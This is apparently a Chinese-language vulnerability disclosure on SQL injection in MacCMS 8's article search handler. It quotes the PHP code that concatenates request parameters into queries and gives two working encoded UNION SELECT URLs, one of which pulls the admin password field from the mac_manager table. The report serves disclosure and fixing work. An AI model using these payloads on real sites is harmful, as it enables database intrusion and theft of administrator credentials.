### 简要描述:
下一次该告一段落,打包了,主要是希望开发意识到为什么你们的be()和360_safe3.php没有起到作用
### 详细说明:
不再具体分析,看第一和第二发,
看下触发页面,inc/module/art.php 第90行:
```
elseif($method=='search')
{
$tpl->P["siteaid"] = 25;
$wd = be("all", "wd");
if(!empty($wd)){
$tpl->P["wd"] = $wd;
}
if (isN($tpl->P["wd"]) && isN($tpl->P["ids"]) && isN($tpl->P["pinyin"]) && isN($tpl->P["letter"]) && isN($tpl->P["tag"]) && isN($tpl->P["type"]) ){ alert ("搜索参数不正确"); }
$tpl->P['cp'] = 'artsearch';
$tpl->P['cn'] = urlencode($tpl->P['wd']).'-'.$tpl->P['pg'].'-'.$tpl->P['order'].'-'.$tpl->P['by'].'-'.$tpl->P['ids']. '-'.$tpl->P['pinyin']. '-'.$tpl->P['type'] .'-'.urlencode($tpl->P['tag']) ;
echoPageCache($tpl->P['cp'],$tpl->P['cn']);
if (!isN($tpl->P["letter"])){
$tpl->P["key"]=$tpl->P["letter"];
$tpl->P["des"] = $tpl->P["des"] . " 首字母为" . $tpl->P["letter"];
$tpl->P["where"] = $tpl->P["where"] . " AND a_letter='" . $tpl->P["letter"] ."' ";
}
if (!isN($tpl->P["wd"])) {
$tpl->P["key"]=$tpl->P["wd"] ;
$tpl->P["des"] = $tpl->P["des"] . " 名称或主演为" . $tpl->P["wd"];
$tpl->P["where"] = $tpl->P["where"] . " AND instr(a_name,'".$tpl->P['wd']."')>0 ";
}
if (!isN($tpl->P["pinyin"])){
$tpl->P["key"]=$tpl->P["pinyin"] ;
$tpl->P["des"] = $tpl->P["des"] . " 拼音为" . $tpl->P["pinyin"];
$tpl->P["where"] = $tpl->P["where"] . " AND instr(a_enname,'".$tpl->P['pinyin']."')>0 ";
}
if (!isN($tpl->P["tag"])){
$tpl->P["key"]=$tpl->P["tag"] ;
$tpl->P["des"] = $tpl->P["des"] . " Tag为" . $tpl->P["tag"];
$tpl->P["where"] = $tpl->P["where"] . " AND instr(a_tag,'".$tpl->P['tag']."')>0 ";
}
$tpl->P['typepid'] = 0;
if(!isN($tpl->P["typeid"])){
$typearr = $MAC_CACHE['arttype'][$tpl->P['typeid']];
if (is_array($typearr)){
$tpl->P['typepid'] = $typearr['t_pid'];
if (isN($tpl->P["key"])){ $tpl->P["key"]= $typearr["t_name"]; }
$tpl->P["des"] = $tpl->P["des"] . " 分类为" . $typearr["t_name"];
$tpl->P["where"] = $tpl->P["where"] . " AND a_type in (" . $typearr["childids"] . ") ";
}
}
$db = new AppDb($MAC['db']['server'],$MAC['db']['user'],$MAC['db']['pass'],$MAC['db']['name']);
$tpl->H = loadFile(MAC_ROOT_TEMPLATE."/art_search.html");
$tpl->mark();
$tpl->pageshow();
```
就这个地方又一大堆注入,直接看测试吧,这里我们用letter做个测试
```
http://localhost/maccms8_mfb/index.php?m=art-search-letter-1235%2527%2520union%2520select%2520user%2528%2529%2520order%2520by%25201%2520desc%2523
```
[<img src="https://images.seebug.org/upload/201406/251007546413a0333e71af7c154e6e82db75895b.png" alt="maccmstest.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/251007546413a0333e71af7c154e6e82db75895b.png)
```
http://localhost/maccms8_mfb/index.php?m=art-search-letter-1235%2527%2520union%2520select%2520m_password%2520from%2520mac_manager%2520order%2520by%25201%2520desc%2523
```
[<img src="https://images.seebug.org/upload/201406/25100912a9e42e627f5c2342570d155fff8c4c88.png" alt="maccmstest2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/25100912a9e42e627f5c2342570d155fff8c4c88.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201406/251007546413a0333e71af7c154e6e82db75895b.png" alt="maccmstest.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/251007546413a0333e71af7c154e6e82db75895b.png)
[<img src="https://images.seebug.org/upload/201406/25100912a9e42e627f5c2342570d155fff8c4c88.png" alt="maccmstest2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/25100912a9e42e627f5c2342570d155fff8c4c88.png)
京公网安备 11010502034610号
暂无评论